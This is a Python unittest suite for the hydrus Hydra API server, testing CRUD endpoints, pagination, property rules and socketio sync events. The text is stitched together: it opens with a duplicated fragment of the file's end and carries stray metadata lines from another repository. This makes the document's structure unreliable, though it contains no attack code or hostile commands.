event['name'] == 'modification_table_diff' # Check received event contains data of newly added modification record. 
assert event['args'][0][0]['method'] == "POST" assert event['args'][0][0]['resource_url'] == "" assert event['args'][0][0]['job_id'] == new_latest_job_id def test_socketio_POST_updates(self): """Test 'update' event emitted by socketio for POST operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Flush old socketio updates self.socketio_client.get_received('/sync') post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Get new socketio update update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == "POST" resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] def test_socketio_DELETE_updates(self): """Test 'update' event emitted by socketio for DELETE operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: # Flush old socketio updates self.socketio_client.get_received('/sync') delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 # Get new update event update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == 'DELETE' resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] if __name__ == '__main__': message = """ Running tests for the app. Checking if all responses are in proper order. """ unittest.main()
51.929705
100
0.550696
"""Test for checking if the response format is proper. Run test_crud before running this.""" import unittest import random import string import json import re import uuid from hydrus.app_factory import app_factory from hydrus.socketio_factory import create_socket from hydrus.utils import set_session, set_doc, set_api_name, set_page_size from hydrus.data import doc_parse, crud from hydra_python_core import doc_maker from hydra_python_core.doc_writer import HydraLink from hydrus.samples import doc_writer_sample from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker, scoped_session from hydrus.data.db_models import Base def gen_dummy_object(class_title, doc): """Create a dummy object based on the definitions in the API Doc. :param class_title: Title of the class whose object is being created. :param doc: ApiDoc. :return: A dummy object of class `class_title`. """ object_ = { "@type": class_title } for class_path in doc.parsed_classes: if class_title == doc.parsed_classes[class_path]["class"].title: for prop in doc.parsed_classes[class_path]["class"].supportedProperty: if isinstance(prop.prop, HydraLink) or prop.write is False: continue if "vocab:" in prop.prop: prop_class = prop.prop.replace("vocab:", "") object_[prop.title] = gen_dummy_object(prop_class, doc) else: object_[prop.title] = ''.join(random.choice( string.ascii_uppercase + string.digits) for _ in range(6)) return object_ class ViewsTestCase(unittest.TestCase): """Test Class for the app.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() print("Creating utilities context... 
") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def setUp(self): for class_ in self.doc.parsed_classes: link_props = {} class_title = self.doc.parsed_classes[class_]["class"].title dummy_obj = gen_dummy_object(class_title, self.doc) for supportedProp in self.doc.parsed_classes[class_]['class'].supportedProperty: if isinstance(supportedProp.prop, HydraLink): class_name = supportedProp.prop.range.replace("vocab:", "") for collection_path in self.doc.collections: coll_class = self.doc.collections[ collection_path]['collection'].class_.title if class_name == coll_class: id_ = str(uuid.uuid4()) crud.insert( gen_dummy_object(class_name, self.doc), id_=id_, session=self.session) link_props[supportedProp.title] = id_ dummy_obj[supportedProp.title] = "{}/{}/{}".format( self.API_NAME, collection_path, id_) crud.insert( dummy_obj, id_=str( uuid.uuid4()), link_props=link_props, session=self.session) # If it's a collection class then add an extra object so # we can test pagination thoroughly. if class_ in self.doc.collections: crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) def test_Index(self): """Test for the index.""" response_get = self.client.get("/{}".format(self.API_NAME)) endpoints = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_put = self.client.put( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_delete = self.client.delete("/{}".format(self.API_NAME)) assert "@context" in endpoints assert endpoints["@id"] == "/{}".format(self.API_NAME) assert endpoints["@type"] == "EntryPoint" assert response_get.status_code == 200 assert response_post.status_code == 405 assert response_put.status_code == 405 assert response_delete.status_code == 405 def test_EntryPoint_context(self): """Test for the EntryPoint context.""" response_get = self.client.get( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={}) response_delete = self.client.delete( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) assert response_get.status_code == 200 assert "@context" in response_get_data assert response_post.status_code == 405 assert response_delete.status_code == 405 def test_Vocab(self): """Test the vocab.""" response_get = self.client.get("/{}/vocab#".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) assert "@context" in response_get_data assert response_get_data["@type"] == "ApiDocumentation" assert response_get_data["@id"] == "{}{}/vocab".format( self.HYDRUS_SERVER_URL, self.API_NAME) assert response_get.status_code == 200 response_delete = self.client.delete( "/{}/vocab#".format(self.API_NAME)) assert response_delete.status_code == 405 response_put = self.client.put( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_put.status_code == 405 response_post = self.client.post( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert 
response_post.status_code == 405 def test_Collections_GET(self): """Test GET on collection endpoints.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) # pdb.set_trace() assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data assert "members" in response_get_data # Check the item URI has the valid format, so it can be dereferenced if len(response_get_data["members"]) > 0: for item in response_get_data["members"]: class_type = item["@type"] if class_type in self.doc.parsed_classes: class_ = self.doc.parsed_classes[class_type]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: item_response = self.client.get( response_get_data["members"][0]["@id"]) assert item_response.status_code == 200 def test_pagination(self): """Test basic pagination""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "view" in response_get_data assert "first" in response_get_data["view"] assert "last" in response_get_data["view"] if "next" in response_get_data["view"]: response_next = self.client.get(response_get_data["view"]["next"]) assert response_next.status_code == 200 response_next_data = json.loads( response_next.data.decode('utf-8')) assert "previous" in response_next_data["view"] break def test_Collections_PUT(self): """Test insert data to the collection.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] dummy_object = gen_dummy_object( collection.class_.title, self.doc) good_response_put = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert good_response_put.status_code == 201 def test_object_POST(self): """Test replace of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( 
initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 200 def test_object_DELETE(self): """Test DELETE of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "DELETE" in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 200 def test_object_PUT_at_id(self): """Create object in collection using PUT at specific ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) if "PUT" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) put_response = self.client.put('{}/{}'.format( endpoints[endpoint], uuid.uuid4()), data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_object_PUT_at_ids(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] data_ = {"data": list()} objects = list() ids = "" for index in range(3): objects.append(gen_dummy_object( collection.class_.title, self.doc)) ids = "{},".format(uuid.uuid4()) data_["data"] = objects if "PUT" in class_methods: put_response = self.client.put( '{}/add/{}'.format(endpoints[endpoint], ids), data=json.dumps(data_)) assert put_response.status_code == 201 def test_endpointClass_PUT(self): """Check non collection Class PUT.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = 
json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_POST(self): """Check non collection Class POST.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 def test_endpointClass_DELETE(self): """Check non collection Class DELETE.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 def test_endpointClass_GET(self): """Check non collection Class GET.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data def test_IriTemplate(self): """Test structure of IriTemplates attached to collections""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] 
class_props = [x.prop for x in class_.supportedProperty] for mapping in response_get_data["search"]["mapping"]: if mapping["property"] not in ["limit", "offset", "pageIndex"]: assert mapping["property"] in class_props def test_client_controlled_pagination(self): """Test pagination controlled by client with help of pageIndex, offset and limit parameters.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] # Test with pageIndex and limit params = {"pageIndex": 1, "limit": 2} response_for_page_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_page_param.status_code == 200 response_for_page_param_data = json.loads( response_for_page_param.data.decode('utf-8')) assert "first" in response_for_page_param_data["view"] assert "last" in response_for_page_param_data["view"] if "next" in response_for_page_param_data["view"]: assert "pageIndex=2" in response_for_page_param_data["view"]["next"] next_response = self.client.get(response_for_page_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "pageIndex=1" in next_response_data["view"]["previous"] # Test with offset and limit params = {"offset": 1, "limit": 2} response_for_offset_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_offset_param.status_code == 200 response_for_offset_param_data = json.loads( response_for_offset_param.data.decode('utf-8')) assert "first" in response_for_offset_param_data["view"] assert "last" in response_for_offset_param_data["view"] if "next" in response_for_offset_param_data["view"]: assert "offset=3" in response_for_offset_param_data["view"]["next"] next_response = self.client.get( response_for_offset_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "offset=1" in next_response_data["view"]["previous"] def test_GET_for_nested_class(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data class_props = [x for x in class_.supportedProperty] for prop_name in class_props: if isinstance(prop_name.prop, HydraLink) and prop_name.read is True: nested_obj_resp = self.client.get( response_get_data[prop_name.title]) 
assert nested_obj_resp.status_code == 200 nested_obj = json.loads( nested_obj_resp.data.decode('utf-8')) assert "@type" in nested_obj elif "vocab:" in prop_name.prop: assert "@type" in response_get_data[prop_name.title] def test_required_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) required_prop = "" for prop in class_.supportedProperty: if prop.required: required_prop = prop.title break if required_prop: del dummy_object[required_prop] put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 400 def test_writeable_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Test for writeable properties post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Test for properties with writeable=False non_writeable_prop = "" for prop in class_.supportedProperty: if prop.write is False: non_writeable_prop = prop.title break if non_writeable_prop != "": dummy_object[non_writeable_prop] = "xyz" post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 405 def test_readable_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: not_readable_prop = "" for prop in class_.supportedProperty: if prop.read is False: not_readable_prop = prop.title break if not_readable_prop: get_response = self.client.get( endpoints[endpoint]) get_response_data = json.loads( get_response.data.decode('utf-8')) assert not_readable_prop not in get_response_data def test_bad_objects(self): """Checks if bad objects are added or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: bad_response_put = self.client.put( endpoints[endpoint], data=json.dumps( dict( foo='bar'))) assert bad_response_put.status_code == 400 def test_bad_requests(self): """Checks if bad requests 
are handled or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" not in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 405 if "DELETE" not in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 405 def test_Endpoints_Contexts(self): """Test all endpoints contexts are generated properly.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 context = json.loads( response_get.data.decode('utf-8'))["@context"] response_context = self.client.get(context) response_context_data = json.loads( response_context.data.decode('utf-8')) assert response_context.status_code == 200 assert "@context" in response_context_data class SocketTestCase(unittest.TestCase): """Test Class for socket events and operations.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() self.socketio_client = self.socketio.test_client(self.app, namespace='/sync') print("Creating utilities context... 
") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def setUp(self): for class_ in self.doc.parsed_classes: class_title = self.doc.parsed_classes[class_]["class"].title dummy_obj = gen_dummy_object(class_title, self.doc) crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) # If it's a collection class then add an extra object so # we can test pagination thoroughly. if class_ in self.doc.collections: crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) # Add two dummy modification records crud.insert_modification_record(method="POST", resource_url="", session=self.session) crud.insert_modification_record(method="DELETE", resource_url="", session=self.session) def test_connect(self): """Test connect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') data = socket_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_reconnect(self): """Test reconnect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') # Flush data of first connect event socket_client.get_received('/sync') # Client reconnects by emitting 'reconnect' event. socket_client.emit('reconnect', namespace='/sync') # Get update received on reconnecting to the server data = socket_client.get_received('/sync') assert len(data) > 0 # Extract the event information event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) # Check last job id with last_job_id received by client in the update. assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_modification_table_diff(self): """Test 'modification-table-diff' events.""" # Flush old received data at socket client self.socketio_client.get_received('/sync') # Set last_job_id as the agent_job_id agent_job_id = crud.get_last_modification_job_id(self.session) # Add an extra modification record newer than the agent_job_id new_latest_job_id = crud.insert_modification_record(method="POST", resource_url="", session=self.session) self.socketio_client.emit('get_modification_table_diff', {'agent_job_id': agent_job_id}, namespace='/sync') data = self.socketio_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'modification_table_diff' # Check received event contains data of newly added modification record. 
assert event['args'][0][0]['method'] == "POST" assert event['args'][0][0]['resource_url'] == "" assert event['args'][0][0]['job_id'] == new_latest_job_id def test_socketio_POST_updates(self): """Test 'update' event emitted by socketio for POST operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Flush old socketio updates self.socketio_client.get_received('/sync') post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Get new socketio update update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == "POST" resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] def test_socketio_DELETE_updates(self): """Test 'update' event emitted by socketio for DELETE operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: # Flush old socketio updates self.socketio_client.get_received('/sync') delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 # Get new update event update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == 'DELETE' resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] if __name__ == '__main__': message = """ Running tests for the app. Checking if all responses are in proper order. """ unittest.main()
10,272
0
203
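The tests in the record above repeatedly pull the ID of a freshly created object out of the response description with re.match(r'(.*)ID (.{36})* (.*)', ...). A small illustration of what that pattern captures; the description wording below is made up for the example, and only the 36-character length of a UUID4 string matters.

# Illustration only: the description text is hypothetical, the regex is the one used in the tests above.
import re
import uuid

id_ = str(uuid.uuid4())                                    # uuid4 strings are exactly 36 characters
description = "Object with ID {} successfully added".format(id_)
matchObj = re.match(r'(.*)ID (.{36})* (.*)', description)
assert matchObj is not None
assert matchObj.group(2) == id_                            # group(2) holds the captured 36-character ID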
c06b33ca0266576dd77b1443051d6971f9e82077
801
py
Python
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
